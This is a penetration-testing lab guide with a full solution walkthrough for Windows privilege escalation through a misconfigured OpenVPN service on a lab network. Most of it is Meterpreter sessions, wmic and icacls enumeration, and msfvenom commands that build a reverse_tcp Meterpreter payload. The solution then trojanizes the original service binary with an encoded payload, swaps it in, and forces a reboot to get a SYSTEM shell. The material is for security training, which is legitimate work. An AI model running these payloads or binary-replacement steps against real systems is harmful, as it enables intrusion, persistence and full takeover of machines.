© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services


In this lab, you can practice privilege escalation techniques. It is important to know that the
remote system has already been compromised and a backdoor has already been installed.
This means that you can get a Meterpreter session on the remote machine without
exploiting it.

The lab diagram is the following:

Your machine will be directly connected to the remote target network (172.50.50.0/24).

• Identify and exploit a vulnerable implementation that may allow privilege escalation
• Identify vulnerable service configuration
• Escalate privileges via services misconfiguration

To guide you during the lab, you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools plus
different methods to achieve the same goal. They are not meant to be used as a
methodology.

Armed with the skills acquired through the tasks, you can achieve the Lab goal.

If this is the first time you are doing this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this document and
check the solutions.

• Metasploit

Labs machines are not connected to the Internet.

Since the lab is mainly focused on privilege escalation, let's assume we already have access
to the target machine. Our target machine OS is Windows 7.

As just stated, we have a working backdoor that you can connect to by configuring
Metasploit as follows:

Module: exploit/multi/handler
Payload: windows/meterpreter/bind_tcp
LPORT: 4450
RHOST: 172.50.50.10

With a working session, verify your privileges on the target machine. Obtain as much
information as possible such as software installed, services, user's privileges, groups, etc.

In the previous task, you should have gathered some useful information about the session
and the remote machine. For example, you should know that the session runs with a
non-privileged user and that the machine is Windows 7 SP1.

With the information gathered, identify a possible attack that may allow you to escalate
privileges up to SYSTEM.

Please read the following hints only if you get stuck. Do not jump to the solution!

Some Metasploit modules may work, but it is worth noting that some of them are not
reliable, since they have a low or average rank. Instead of using these modules, try to gather
information about running services and think of a possible attack strategy.

The Windows Management Instrumentation Command-line (wmic) is a very useful tool
that can be used to query services.

Get a list of the running services as well as information about their binary paths. Do you
have write privileges on any of these paths?

The OpenVPN service is very tempting:

• It runs as SYSTEM
• It automatically starts on boot
• Its binary is stored in a folder on which we have write privileges.

We have already installed a backdoor on the remote machine. To get a Meterpreter session,
let's configure the Metasploit handler module as follows:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.10
RHOST => 172.50.50.10
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.50.50.10
[*] Meterpreter session 1 opened (172.50.50.100:33710 -> 172.50.50.10:4450) at 2016-05-17 14:35:53 +0200

meterpreter >

Now we have a working session on the remote machine.

During the information gathering phase, there are many tasks, modules and tools that we
can use. In these solutions, we will only cover the tasks and information needed to reach
our goal.

First, let us get some information about the remote machine, such as our privileges. We can
do this by running different modules and scripts such as win_privs, getuid, winenum,
scraper and more.

meterpreter > getuid
Server username: els-PC\els_user

Winenum is a great module. It gathers a lot of information from the remote system and
stores it in different files:

meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.10:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-PC_20160517.3735/ELS-PC_20160517.3735.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/ELS-PC_20160517.3735
[*] Checking if ELS-PC is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command net view

For example, let's list the Administrator users:

root@kali:~/.msf4/logs/scripts/winenum/ELS-PC_20160517.3735# cat net_localgroup_administrators.txt
Alias name administrators
Comment Administrators have complete and unrestricted access to the
computer/domain

Members
-------------------------------------------------------------------------------
Administrator
els
eLS_Admin
The command completed successfully.

As we can see, els_user is not an Administrator. From the following file, we can
see the groups els_user belongs to:

Using win_privs, we can extract some information about the current user and its
privileges. In this scenario, UAC is not enabled and we are neither Admin nor SYSTEM user:

meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin Is System UAC Enabled Foreground ID UID
-------- --------- ----------- ------------- ---
False False False 1 "els-PC\\els_user"

Windows Privileges
==================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege

Since we are not Administrator, we have to find a way to escalate privileges to SYSTEM.

In this lab, we are not going to use any Metasploit module. Instead, we will try to exploit
service misconfigurations.

First, let's get the list of services installed on the machine. We can do this in a few different
ways. For example, we can use net start:

meterpreter > shell
Process 1664 created.
Channel 40 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net start
net start
These Windows services are started:

Base Filtering Engine
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher

Further information can be extracted using another Windows tool named wmic. In this
case, the command is the following:

C:\Windows\system32>wmic service list brief
wmic service list brief
ExitCode Name ProcessId StartMode State Status
0 AeLookupSvc 0 Manual Stopped OK
1077 ALG 0 Manual Stopped OK
1077 AppIDSvc 0 Manual Stopped OK
1077 Appinfo 0 Manual Stopped OK
1077 AppMgmt 0 Manual Stopped OK
0 AudioEndpointBuilder 800 Auto Running OK
0 Audiosrv 756 Auto Running OK
1077 AxInstSV 0 Manual Stopped OK
1077 BDESVC 0 Manual Stopped OK
0 BFE 1180 Auto Running OK
1077 BITS 0 Manual Stopped OK
0 Browser 824 Manual Running OK
1077 bthserv 0 Manual Stopped OK

As we can see, for each service, we can obtain information such as name, state, and start
mode. Note that this is just a brief overview of the installed services. We will see how to get
more information later on in this document.

Now that we have enough information about our target machine, let's focus our operations
on how to escalate privileges. We don't have a working exploit for this task. Therefore, we
have to analyze the machine and find another way to exploit it.

To escalate privileges, we should find and exploit services that:

1. run with higher privileges
2. automatically start at boot
• OR can be restarted (with lower privileges)
• OR are vulnerable to DoS (meaning that we can cause the service to crash and
let Windows restart it automatically)
3. have their binaries in paths where we have write privileges.

Hence, we should be able to escalate privileges if we find a service that meets all of the
previous requirements.

So, let's extract a complete overview of the installed services by running the following
command:

C:\Windows\system32>cd C:\Users\els
cd C:\Users\els

C:\Users\els>wmic service > serv_list.txt
wmic service > serv_list.txt

Note: Be sure to run the command in a path on the remote machine where you have
write privileges (C:\Users\els in our case).

We saved the wmic service command output into serv_list.txt so we can analyze the
results carefully from our system. So, let's download the file using the Meterpreter shell:

C:\Windows\system32>^C
Terminate channel 41? [y/N] y
meterpreter > download C:\\Users\\eLS\\serv_list.txt serv_list.txt
[*] downloading: C:\Users\eLS\serv_list.txt -> serv_list.txt
[*] download : C:\Users\eLS\serv_list.txt -> serv_list.txt
meterpreter >

We can now inspect its content:

As we can see from the previous screenshots, this file contains everything we need for our
analysis. We can find the path for each service binary, as well as the associated user.
However, inspecting this file may be very tedious, so we have to find a way to filter it and
extract only the required information.

In the second screenshot, we can see that a lot of service binaries are stored in the
C:\Windows\system32 folder. Remember that one of our prerequisites is “having write
privileges on the path where the target service binary is stored”.

Usually, low-privileged users like ours (els_user) do not have write privileges on this
directory. So, if this is true, we can ignore all the services stored in system32.

Let's check our privileges using icacls via the command shell:

meterpreter > shell
Process 3396 created.
Channel 43 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>icacls C:\windows\system32
icacls C:\windows\system32
C:\windows\system32 NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(M)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(M)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(RX)
BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

As we can see, we have only RX (read/execute) privileges on this folder. This means
that we can ignore all the services that have their binary stored in the system32 folder.

To get a filtered list of services, we can tweak the wmic command used before. We want to
get all the services that do not have the string system32 in their binary path.

Here's the command that filters the search:

C:\Windows\system32>wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name
Name PathName
clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
ehRecvr C:\Windows\ehome\ehRecvr.exe
ehSched C:\Windows\ehome\ehsched.exe
FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
idsvc "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe"
NetTcpPortSharing "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe"
OpenVPNService C:\Program Files\OpenVPN\bin\openvpnserv.exe
TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
VMTools "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
WMPNetworkSvc "C:\Program Files\Windows Media Player\wmpnetwk.exe"

The previous command printed the name (Name) and path (PathName) of the services that
do not have the string system32 in their PathName (the string that defines the binary path of
the service).

Just as we did previously, let's save the results into a file and then download it locally:

C:\Windows\system32>wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name > C:\Users\els\filt_serv.txt
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name > C:\Users\els\filt_serv.txt

C:\Windows\system32>^C
Terminate channel 45? [y/N] y
meterpreter > download C:\\Users\\els\\filt_serv.txt filt_serv.txt
[*] downloading: C:\Users\els\filt_serv.txt -> filt_serv.txt
[*] download : C:\Users\els\filt_serv.txt -> filt_serv.txt
meterpreter >

Let us open this file and check its contents.

As we can see, the output is shorter, but we still have all the information needed.

Now we should verify the permissions for each file and folder listed in it; we should also
check if we have write permissions on at least one of these.

Note that you can create a batch file that automatically does all these steps.
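As an added example (not part of the lab material), here is a Python script that does the same filtering offline on the downloaded serv_list.txt: it parses wmic's fixed-width table by header offsets, so paths containing spaces survive, and reports every service that runs as LocalSystem, starts automatically and lives outside system32, with the folder and binary to check with icacls. The sample table is constructed here in wmic's padded layout, and load_serv_list assumes the redirected file is UTF-16 as wmic writes it.

```python
import ntpath
import re

# Constructed sample in the layout of `wmic service get Name,PathName,StartMode,StartName,State`.
# wmic pads every column to its widest value plus two spaces, so a value that itself contains
# spaces (anything under "Program Files") can only be split reliably by header offsets.
_WIDTHS = (16, 53, 11, 27, 9)


def _wmic_row(*cells):
    return "".join(cell.ljust(width) for cell, width in zip(cells, _WIDTHS))


SAMPLE_SERV_LIST = "\r\n".join([
    _wmic_row("Name", "PathName", "StartMode", "StartName", "State"),
    _wmic_row("Audiosrv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto",
              r"NT AUTHORITY\LocalService", "Running"),
    _wmic_row("ehSched", r"C:\Windows\ehome\ehsched.exe", "Manual", "LocalSystem", "Stopped"),
    _wmic_row("OpenVPNService", r"C:\Program Files\OpenVPN\bin\openvpnserv.exe", "Auto",
              "LocalSystem", "Running"),
    _wmic_row("VMTools", r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"', "Auto",
              "LocalSystem", "Running"),
]) + "\r\n"


def parse_wmic_table(text):
    """Turn wmic's fixed-width table into one dict per service, keyed by column header."""
    # A redirected wmic file uses \r\r\n line endings; splitlines() plus the filter absorbs that.
    lines = [line for line in text.splitlines() if line.strip()]
    starts = [m.start() for m in re.finditer(r"\S+", lines[0])]
    spans = list(zip(starts, starts[1:] + [None]))
    headers = [lines[0][s:e].strip() for s, e in spans]
    return [{h: row[s:e].strip() for h, (s, e) in zip(headers, spans)} for row in lines[1:]]


def load_serv_list(path):
    """Read a serv_list.txt produced by `wmic service > serv_list.txt` (UTF-16LE with BOM)."""
    with open(path, encoding="utf-16") as fh:
        return parse_wmic_table(fh.read())


def binary_path(pathname):
    """Extract the executable from a PathName, whether quoted, bare, or followed by arguments."""
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)]
    match = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)
    return match.group(1) if match else pathname.split(" ")[0]


def candidate_services(rows):
    """Services meeting the first two prerequisites (LocalSystem, auto-start) whose binary
    lives outside system32; returns (name, binary, folder) so each path can be fed to icacls."""
    found = []
    for row in rows:
        if (row["StartMode"] == "Auto" and row["StartName"] == "LocalSystem"
                and "system32" not in row["PathName"].lower()):
            exe = binary_path(row["PathName"])
            found.append((row["Name"], exe, ntpath.dirname(exe)))
    return found


if __name__ == "__main__":
    for name, exe, folder in candidate_services(parse_wmic_table(SAMPLE_SERV_LIST)):
        print(f"{name}: check icacls on {folder!r} and {exe!r}")
```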

While running our tests on OpenVPNService, we can see that our user has write
permissions on the folder C:\Program Files\OpenVPN\bin.

C:\Windows\system32>icacls "C:\Program Files\OpenVPN\bin"
icacls "C:\Program Files\OpenVPN\bin"
C:\Program Files\OpenVPN\bin els-PC\els_user:(I)(OI)(CI)(M)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Windows\system32>icacls "C:\Program Files\OpenVPN\bin\openvpnserv.exe"
icacls "C:\Program Files\OpenVPN\bin\openvpnserv.exe"
C:\Program Files\OpenVPN\bin\openvpnserv.exe els-PC\els_user:(I)(M)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

So far, we have one of the previous 3 prerequisites: write permissions. Let us check if
the OpenVPN service runs with higher privileges and if it automatically starts at boot.
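As an added example (not the lab's own code), the icacls check above expressed in Python: it parses the icacls output for the queried path, skips inherit-only ACEs, lets a deny entry override an allow, and reports which of the principals we care about can actually write to the object. The two outputs are copies of those shown above; WRITE_RIGHTS is a simplified assumption about which rights allow replacing a file.

```python
import re

# Rights tokens that let a principal create, modify or replace a file (simplified assumption:
# full/modify/write plus the granular add-file and write-data rights icacls prints).
WRITE_RIGHTS = {"F", "M", "W", "GW", "WD", "AD"}

# Copies of the two icacls outputs shown above (system32 and the OpenVPN bin folder).
ICACLS_SYSTEM32 = r"""
C:\windows\system32 NT SERVICE\TrustedInstaller:(F)
                    NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                    NT AUTHORITY\SYSTEM:(M)
                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                    BUILTIN\Administrators:(M)
                    BUILTIN\Administrators:(OI)(CI)(IO)(F)
                    BUILTIN\Users:(RX)
                    BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                    CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

ICACLS_OPENVPN_BIN = r"""
C:\Program Files\OpenVPN\bin els-PC\els_user:(I)(OI)(CI)(M)
                             BUILTIN\Administrators:(I)(F)
                             CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                             BUILTIN\Users:(I)(OI)(CI)(RX)
                             NT SERVICE\TrustedInstaller:(I)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE per line: "principal:(flag)(flag)(rights)"; principals may contain spaces.
_ACE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")


def write_capable(icacls_output, path, principals):
    """Return the subset of `principals` holding an effective write-capable ACE on `path`."""
    wanted = {p.lower(): p for p in principals}
    allowed, denied = set(), set()
    for line in icacls_output.splitlines():
        line = line.strip()
        # icacls prints the queried path in front of the first ACE; drop it before parsing.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        match = _ACE.match(line)
        if not match:
            continue                      # blank line or the "Successfully processed" trailer
        who = match.group(1).lower()
        tokens = {t for group in re.findall(r"\(([^)]*)\)", match.group(2))
                  for t in group.split(",")}
        if "IO" in tokens or who not in wanted:
            continue                      # inherit-only ACEs apply to children, not this object
        if tokens & WRITE_RIGHTS:
            (denied if "DENY" in tokens else allowed).add(who)
    return {wanted[w] for w in allowed - denied}   # a matching deny ACE wins over an allow


if __name__ == "__main__":
    us = [r"els-PC\els_user", r"BUILTIN\Users"]
    print("system32 writable by:", write_capable(ICACLS_SYSTEM32, r"C:\windows\system32", us))
    print("OpenVPN\\bin writable by:",
          write_capable(ICACLS_OPENVPN_BIN, r"C:\Program Files\OpenVPN\bin", us))
```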

We can check both of these in the file serv_list.txt. At line 64, we have the
OpenVPN service entry:

As we can see, the StartMode is set to Auto and the StartName is LocalSystem. So, it
seems that the OpenVPN service matches all our requirements.

Since we have write permissions, we can replace the openvpnserv.exe file, which is the
binary executed when the service starts, with a custom exploit, and then force a service
restart or a machine reboot.

So, firstly, let us create our exploit with msfvenom as follows:

root@kali:~/LABS/15# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 --platform Windows -f exe > openvpnserv.exe
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

With the previous command, we create an exploit that tries a reverse TCP connection to
our machine at port 4460.

Before uploading the exploit to the remote machine, let us create a backup of the original
openvpnserv.exe using the mv command.

meterpreter > cd "C:\\Program Files\\OpenVPN\\bin"
meterpreter > mv openvpnserv.exe openvpnserv.exe.bck
meterpreter > ls
Listing: C:\Program Files\OpenVPN\bin
=====================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 161 fil 2014-02-24 13:03:51 +0100 addtap.bat
100777/rwxrwxrwx 198 fil 2014-02-24 13:03:51 +0100 deltapall.bat
100666/rw-rw-rw- 1206784 fil 2009-12-12 00:48:34 +0100 libeay32.dll
100666/rw-rw-rw- 86528 fil 2009-12-12 00:48:34 +0100 libpkcs11-helper-1.dll
100666/rw-rw-rw- 232448 fil 2009-12-12 00:48:34 +0100 libssl32.dll
100777/rwxrwxrwx 1534464 fil 2009-12-12 00:48:34 +0100 openssl.exe
100777/rwxrwxrwx 104696 fil 2009-12-12 00:48:34 +0100 openvpn-gui-1.0.3.exe
100777/rwxrwxrwx 578048 fil 2009-12-12 00:47:44 +0100 openvpn.exe
100666/rw-rw-rw- 36352 fil 2009-12-12 00:47:44 +0100 openvpnserv.exe.bck
100777/rwxrwxrwx 77312 fil 2009-12-12 00:48:34 +0100 tapinstall.exe

meterpreter > upload /root/LABS/15/openvpnserv.exe openvpnserv.exe
[*] uploading : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
[*] uploaded : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe

Now that the exploit has been uploaded, we need to start a handler on our machine and
then force the service to restart. So let us create and start the handler:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.100
LHOST => 172.50.50.100
msf exploit(handler) > set LPORT 4460
LPORT => 4460
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.50.50.100:4460
[*] Starting the payload handler...

We know that the service automatically starts when the machine boots, so we can try to
reboot the machine.

(As you can imagine, this is not very stealthy)

In order to force a machine to reboot, we can use the following command from our
meterpreter shell:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > reboot -f 2
Rebooting...

[*] 172.50.50.10 - Meterpreter session 1 closed. Reason: Died

Of course, as soon as we reboot the machine, we lose our Meterpreter session, but after a
few seconds (once the remote machine starts again) we can see that the new handler we
created starts working. We get a new Meterpreter session with SYSTEM privileges!

msf exploit(handler) >
[*] Sending stage (957999 bytes) to 172.50.50.10
[*] Meterpreter session 2 opened (172.50.50.100:4460 -> 172.50.50.10:49155) at 2016-05-17 15:55:20 +0200

That is great! The exploit works, but after a few seconds the Meterpreter session dies.

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 1...

meterpreter >

[*] 172.50.50.10 - Meterpreter session 2 closed. Reason: Died

This happens because Windows tries to start the service (our exploit is executed) but it
fails. By default, if the service does not successfully start, Windows kills it and we lose our
session.

To avoid this, we can use different approaches:

1. Configure the handler module to automatically migrate once we get a new session.
We can do this by setting the AutoRunScript option to one of the two following
values:

msf exploit(handler) > set AutoRunScript explorer.exe
AutoRunScript => explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f
AutoRunScript => migrate -f

2. Once we get a session, manually run the migrate command. In this case, we need to be
very fast!
3. Inject our payload into the original binary (openvpnserv.exe). This will allow us
to get a new session while the OpenVPN service still works in the background.

Let us see how to inject our payload into an existing binary, that is, alternative #3.

First, we need to download the original openvpnserv.exe locally. We can do this by using
our first Meterpreter session:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > download "C:\\Program Files\\OpenVPN\\bin\\openvpnserv.exe.bck" openvpnserv.exe.bck
[*] downloading: C:\Program Files\OpenVPN\bin\openvpnserv.exe.bck -> openvpnserv.exe.bck
[*] download : C:\Program Files\OpenVPN\bin\openvpnserv.exe.bck -> openvpnserv.exe.bck

Having downloaded the original OpenVPN binary (renamed to openvpnserv.exe.bck), we
have to inject a reverse TCP shell into it as follows:

root@kali:~/LABS/15# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 -f exe -e x86/shikata_ga_nai -i 15 -k -x openvpnserv.exe.bck > openvpnserv.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 15 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)

x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai succeeded with size 657 (iteration=11)
x86/shikata_ga_nai succeeded with size 684 (iteration=12)
x86/shikata_ga_nai succeeded with size 711 (iteration=13)
x86/shikata_ga_nai succeeded with size 738 (iteration=14)
x86/shikata_ga_nai chosen with final size 738
Payload size: 738 bytes

As you can see, with msfvenom we can inject and encode the payload into an existing
binary.

First, we need to start the handler once again before we reboot the machine.

Reconfigure handler with the migrate option:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.100
LHOST => 172.50.50.100
msf exploit(handler) > set LPORT 4460
LPORT => 4460
msf exploit(handler) > set AutoRunScript explorer.exe
AutoRunScript => explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f
AutoRunScript => migrate -f
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Now, let's copy the new openvpnserv.exe file back into the remote machine from the
existing meterpreter session, and reboot the machine once again:

meterpreter > cd "C:\\Program Files\\OpenVPN\\bin"
meterpreter > upload /root/LABS/15/openvpnserv.exe openvpnserv.exe
[*] uploading : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
[*] uploaded : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
meterpreter > reboot -f 2
Rebooting...

[*] 172.50.50.10 - Meterpreter session 1 closed. Reason: Died

After the reboot our exploit works fine and the connection is stable! Moreover, we have
SYSTEM privileges!

msf exploit(handler) >
[*] Sending stage (957999 bytes) to 172.50.50.10
[*] Meterpreter session 3 opened (172.50.50.100:4460 -> 172.50.50.10:49155) at 2016-05-17 16:13:31 +0200
[*] Session ID 3 (172.50.50.100:4460 -> 172.50.50.10:49155) processing AutoRunScript 'migrate -f'

[*] Current server process: openvpnserv.exe (1372)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2372
[+] Successfully migrated to process

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
